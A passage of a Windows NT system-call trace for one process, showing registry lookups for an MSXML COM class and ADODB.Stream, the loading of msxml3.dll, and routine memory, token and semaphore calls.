 02210   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02211   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02212   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02213   456   NtClose  (300, ... ) == 0x0
 02214   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02215   456   NtOpenKey  (0x2000000, {24, 298, 0x40, 0, 0,  (0x2000000, {24, 298, 0x40, 0, 0, "LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02216   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}_"}, 162, ) }, 162, ) == 0x0
 02217   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02218   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02219   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02220   456   NtClose  (300, ... ) == 0x0
 02221   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02222   456   NtOpenKey  (0x2000000, {24, 298, 0x40, 0, 0,  (0x2000000, {24, 298, 0x40, 0, 0, "InprocServer32"}, ... 300, ) }, ... 300, ) == 0x0
 02223   456   NtQueryKey  (302, Name, 392, ... {Name= (302, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32"}, 192, ) }, 192, ) == 0x0
 02224   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02225   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 304, ) == 0x0
 02226   456   NtQueryInformationToken  (304, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02227   456   NtClose  (304, ... ) == 0x0
 02228   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02229   456   NtQueryValueKey  (302, 0x0, Partial, 144, ... TitleIdx=0, Type=2, Data= (302, 0x0, Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0x\0m\0l\03\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0
 02230   456   NtClose  (302, ... ) == 0x0
 02231   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}_"}, 162, ) }, 162, ) == 0x0
 02232   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02233   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02234   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02235   456   NtClose  (300, ... ) == 0x0
 02236   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InprocHandler32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02237   456   NtOpenKey  (0x2000000, {24, 298, 0x40, 0, 0,  (0x2000000, {24, 298, 0x40, 0, 0, "InprocHandler32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02238   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}_"}, 162, ) }, 162, ) == 0x0
 02239   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02240   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02241   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02242   456   NtClose  (300, ... ) == 0x0
 02243   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InprocHandlerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02244   456   NtOpenKey  (0x2000000, {24, 298, 0x40, 0, 0,  (0x2000000, {24, 298, 0x40, 0, 0, "InprocHandlerX86"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02245   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}_"}, 162, ) }, 162, ) == 0x0
 02246   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02247   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02248   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02249   456   NtClose  (300, ... ) == 0x0
 02250   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02251   456   NtOpenKey  (0x2000000, {24, 298, 0x40, 0, 0,  (0x2000000, {24, 298, 0x40, 0, 0, "LocalServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02252   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}_"}, 162, ) }, 162, ) == 0x0
 02253   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02254   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02255   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02256   456   NtClose  (300, ... ) == 0x0
 02257   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\LocalServer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02258   456   NtOpenKey  (0x2000000, {24, 298, 0x40, 0, 0,  (0x2000000, {24, 298, 0x40, 0, 0, "LocalServer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02259   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02260   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02261   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... 300, ) }, ... 300, ) == 0x0
 02262   456   NtQueryKey  (302, Name, 392, ... {Name= (302, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}2"}, 162, ) }, 162, ) == 0x0
 02263   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02264   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 304, ) == 0x0
 02265   456   NtQueryInformationToken  (304, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02266   456   NtClose  (304, ... ) == 0x0
 02267   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02268   456   NtQueryValueKey  (302,  (302, "AppID", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02269   456   NtClose  (302, ... ) == 0x0
 02270   456   NtClose  (298, ... ) == 0x0
 02271   456   NtOpenProcess  (0x400, {24, 0, 0x0, 0, 0, 0x0}, {452, 0}, ... 296, ) == 0x0
 02272   456   NtQueryInformationProcess  (296, Session, 4, ... {SessionId=0,}, 0x0, ) == 0x0
 02273   456   NtClose  (296, ... ) == 0x0
 02274   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02275   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02276   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... 296, ) }, ... 296, ) == 0x0
 02277   456   NtClose  (298, ... ) == 0x0
 02278   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES0"}, 138, ) }, 138, ) == 0x0
 02279   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02280   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... 296, ) }, ... 296, ) == 0x0
 02281   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}2"}, 162, ) }, 162, ) == 0x0
 02282   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02283   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02284   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02285   456   NtClose  (300, ... ) == 0x0
 02286   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02287   456   NtOpenKey  (0x2000000, {24, 298, 0x40, 0, 0,  (0x2000000, {24, 298, 0x40, 0, 0, "InprocServer32"}, ... 300, ) }, ... 300, ) == 0x0
 02288   456   NtQueryKey  (302, Name, 392, ... {Name= (302, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32"}, 192, ) }, 192, ) == 0x0
 02289   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02290   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 304, ) == 0x0
 02291   456   NtQueryInformationToken  (304, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02292   456   NtClose  (304, ... ) == 0x0
 02293   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02294   456   NtQueryValueKey  (302,  (302, "ThreadingModel", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0p\0a\0r\0t\0m\0e\0n\0t\0\0\0"}, 32, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (302, "ThreadingModel", Partial, 144, ... TitleIdx=0, Type=1, Data="A\0p\0a\0r\0t\0m\0e\0n\0t\0\0\0"}, 32, ) }, 32, ) == 0x0
 02295   456   NtClose  (302, ... ) == 0x0
 02296   456   NtClose  (298, ... ) == 0x0
 02297   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02298   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02299   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}"}, ... 296, ) }, ... 296, ) == 0x0
 02300   456   NtQueryKey  (298, Name, 384, ... {Name= (298, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}2"}, 162, ) }, 162, ) == 0x0
 02301   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02302   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 300, ) == 0x0
 02303   456   NtQueryInformationToken  (300, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02304   456   NtClose  (300, ... ) == 0x0
 02305   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02306   456   NtOpenKey  (0x1, {24, 298, 0x40, 0, 0,  (0x1, {24, 298, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02307   456   NtClose  (298, ... ) == 0x0
 02308   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\msxml3.dll"}, 1234876, ... ) }, 1234876, ... ) == 0x0
 02309   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\msxml3.dll"}, 5, 96, ... 296, {status=0x0, info=1}, ) }, 5, 96, ... 296, {status=0x0, info=1}, ) == 0x0
 02310   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 296, ... 300, ) == 0x0
 02311   456   NtClose  (296, ... ) == 0x0
 02312   456   NtMapViewOfSection  (300, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xcd0000), 0x0, 1122304, ) == 0x0
 02313   456   NtClose  (300, ... ) == 0x0
 02314   456   NtUnmapViewOfSection  (-1, 0xcd0000, ... ) == 0x0
 02315   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\msxml3.dll"}, 1235192, ... ) }, 1235192, ... ) == 0x0
 02316   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\msxml3.dll"}, 5, 96, ... 300, {status=0x0, info=1}, ) }, 5, 96, ... 300, {status=0x0, info=1}, ) == 0x0
 02317   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 300, ... 296, ) == 0x0
 02318   456   NtQuerySection  (296, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02319   456   NtClose  (300, ... ) == 0x0
 02320   456   NtMapViewOfSection  (296, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x72e00000), 0x0, 1130496, ) == 0x0
 02321   456   NtClose  (296, ... ) == 0x0
 02322   456   NtAllocateVirtualMemory  (-1, 1421312, 0, 20480, 4096, 4, ... 1421312, 20480, ) == 0x0
 02323   456   NtDuplicateObject  (-1, -2, -1, 0x4a, 0, 0, ... 296, ) == 0x0
 02324   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02325   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02326   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02327   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02328   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02329   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 13434880, 262144, ) == 0x0
 02330   456   NtAllocateVirtualMemory  (-1, 13434880, 0, 4096, 4096, 4, ... 13434880, 4096, ) == 0x0
 02331   456   NtAllocateVirtualMemory  (-1, 13438976, 0, 28672, 4096, 4, ... 13438976, 28672, ) == 0x0
 02332   456   NtCreateSemaphore  (0x1f0003, 0x0, 0, 256, ... 300, ) == 0x0
 02333   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02334   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 13697024, 262144, ) == 0x0
 02335   456   NtAllocateVirtualMemory  (-1, 13697024, 0, 4096, 4096, 4, ... 13697024, 4096, ) == 0x0
 02336   456   NtCreateSemaphore  (0x1f0003, 0x0, 0, 256, ... 304, ) == 0x0
 02337   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02338   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 13959168, 262144, ) == 0x0
 02339   456   NtAllocateVirtualMemory  (-1, 13959168, 0, 4096, 4096, 4, ... 13959168, 4096, ) == 0x0
 02340   456   NtCreateSemaphore  (0x1f0003, 0x0, 0, 256, ... 308, ) == 0x0
 02341   456   NtCreateSemaphore  (0x1f0003, 0x0, 0, 256, ... 312, ) == 0x0
 02342   456   NtCreateSemaphore  (0x1f0003, 0x0, 0, 256, ... 316, ) == 0x0
 02343   456   NtCreateSemaphore  (0x1f0003, 0x0, 0, 256, ... 320, ) == 0x0
 02344   456   NtCreateSemaphore  (0x1f0003, 0x0, 0, 256, ... 324, ) == 0x0
 02345   456   NtCreateEvent  (0x1f0003, 0x0, 0, 1, ... 328, ) == 0x0
 02346   456   NtCreateSemaphore  (0x1f0003, 0x0, 0, 256, ... 332, ) == 0x0
 02347   456   NtCreateSemaphore  (0x1f0003, 0x0, 0, 256, ... 336, ) == 0x0
 02348   456   NtAllocateVirtualMemory  (-1, 1441792, 0, 4096, 4096, 4, ... 1441792, 4096, ) == 0x0
 02349   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "Software\Microsoft\Msxml30"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02350   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02351   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02352   456   NtAllocateVirtualMemory  (-1, 1445888, 0, 12288, 4096, 4, ... 1445888, 12288, ) == 0x0
 02353   456   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 14221312, 65536, ) == 0x0
 02354   456   NtQueryVirtualMemory  (-1, 0xd90000, Basic, 28, ... {BaseAddress=0xd90000,AllocationBase=0xd90000,AllocationProtect=0x4,RegionSize=0x10000,State=0x2000,Protect=0x0,Type=0x20000,}, 28, ) == 0x0
 02355   456   NtAllocateVirtualMemory  (-1, 14221312, 0, 4097, 4096, 4, ... 14221312, 8192, ) == 0x0
 02356   456   NtQueryVirtualMemory  (-1, 0xd90000, Basic, 28, ... {BaseAddress=0xd90000,AllocationBase=0xd90000,AllocationProtect=0x4,RegionSize=0x2000,State=0x1000,Protect=0x4,Type=0x20000,}, 28, ) == 0x0
 02357   456   NtQueryDefaultLocale  (1, 1234896, ... ) == 0x0
 02358   456   NtFreeVirtualMemory  (-1, (0xd90000), 0, 32768, ... (0xd90000), 65536, ) == 0x0
 02359   456   NtAllocateVirtualMemory  (-1, 0, 0, 4194304, 8192, 4, ... 17301504, 4194304, ) == 0x0
 02360   456   NtAllocateVirtualMemory  (-1, 17301504, 0, 65536, 4096, 4, ... 17301504, 65536, ) == 0x0
 02361   456   NtQueryDefaultLocale  (1, 1233712, ... ) == 0x0
 02362   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\msxml3r.dll"}, 1233932, ... ) }, 1233932, ... ) == 0x0
 02363   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\msxml3r.dll"}, 5, 96, ... 340, {status=0x0, info=1}, ) }, 5, 96, ... 340, {status=0x0, info=1}, ) == 0x0
 02364   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 340, ... 344, ) == 0x0
 02365   456   NtClose  (340, ... ) == 0x0
 02366   456   NtMapViewOfSection  (344, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xd90000), 0x0, 45056, ) == 0x0
 02367   456   NtClose  (344, ... ) == 0x0
 02368   456   NtUnmapViewOfSection  (-1, 0xd90000, ... ) == 0x0
 02369   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\msxml3r.dll"}, 1233572, ... ) }, 1233572, ... ) == 0x0
 02370   456   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 1234272,  (0x80100080, {24, 0, 0x40, 0, 1234272, "\??\C:\WINDOWS\System32\msxml3r.dll"}, 0x0, 0, 5, 1, 96, 0, 0, ... 344, {status=0x0, info=1}, ) }, 0x0, 0, 5, 1, 96, 0, 0, ... 344, {status=0x0, info=1}, ) == 0x0
 02371   456   NtCreateSection  (0xf0005, 0x0, 0x0, 2, 134217728, 344, ... 340, ) == 0x0
 02372   456   NtClose  (344, ... ) == 0x0
 02373   456   NtMapViewOfSection  (340, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 2, ... (0xd90000), {0, 0}, 45056, ) == 0x0
 02374   456   NtClose  (340, ... ) == 0x0
 02375   456   NtQueryDefaultLocale  (1, 1233712, ... ) == 0x0
 02376   456   NtQueryVirtualMemory  (-1, 0xd90000, Basic, 28, ... {BaseAddress=0xd90000,AllocationBase=0xd90000,AllocationProtect=0x2,RegionSize=0xb000,State=0x1000,Protect=0x2,Type=0x40000,}, 0x0, ) == 0x0
 02377   456   NtAllocateVirtualMemory  (-1, 13467648, 0, 8192, 4096, 4, ... 13467648, 8192, ) == 0x0
 02378   456   NtAllocateVirtualMemory  (-1, 13475840, 0, 16384, 4096, 4, ... 13475840, 16384, ) == 0x0
 02379   456   NtAllocateVirtualMemory  (-1, 13492224, 0, 8192, 4096, 4, ... 13492224, 8192, ) == 0x0
 02380   456   NtCreateSemaphore  (0x1f0003, 0x0, 0, 256, ... 340, ) == 0x0
 02381   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02382   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 344, ) }, ... 344, ) == 0x0
 02383   456   NtQueryValueKey  (344,  (344, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (344, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02384   456   NtClose  (344, ... ) == 0x0
 02385   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES"}, 138, ) }, 138, ) == 0x0
 02386   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "ADODB.Stream"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02387   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\ADODB.Stream"}, ... 344, ) }, ... 344, ) == 0x0
 02388   456   NtQueryKey  (346, Name, 384, ... {Name= (346, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\ADODB.StreamC"}, 98, ) }, 98, ) == 0x0
 02389   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02390   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 348, ) == 0x0
 02391   456   NtQueryInformationToken  (348, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02392   456   NtClose  (348, ... ) == 0x0
